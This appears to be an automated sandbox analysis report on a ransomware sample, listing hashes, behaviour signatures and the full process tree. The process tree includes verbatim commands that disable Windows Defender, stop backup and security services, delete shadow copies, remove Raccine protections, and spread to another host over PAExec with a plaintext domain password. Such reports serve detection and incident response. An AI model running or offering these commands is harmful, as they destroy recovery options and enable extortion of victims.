Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
General
-
Target
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
-
Size
97KB
-
MD5
212614aa34906a41edd51491c7980529
-
SHA1
671f1031d3b2cd242a270e17718cc0fe20122ad0
-
SHA256
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00
-
SHA512
21a57568c090f0ed72b599168a16d1bfb2073e639972fb0268e6d91143f5bb54292fd6a15fea20f6d90ee817eafebf771b6c7771318a90de148fd95692f49d6a
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 64 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.18 /USER:SHJPOLICE\amer !Omar20122⤵
-
-
C:\Users\Admin\AppData\Local\Temp\k4gt3gok.exe"C:\Users\Admin\AppData\Local\Temp\k4gt3gok.exe" \10.10.0.18 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵
-
C:\Windows\PAExec-4312-RJMQBVDN.exeC:\Windows\PAExec-4312-RJMQBVDN.exe -service1⤵
-
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Windows\TEMP\tmp8AFB.bat3⤵
-
C:\Windows\system32\mountvol.exemountvol4⤵
-
-
C:\Windows\system32\find.exefind "}\"4⤵
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
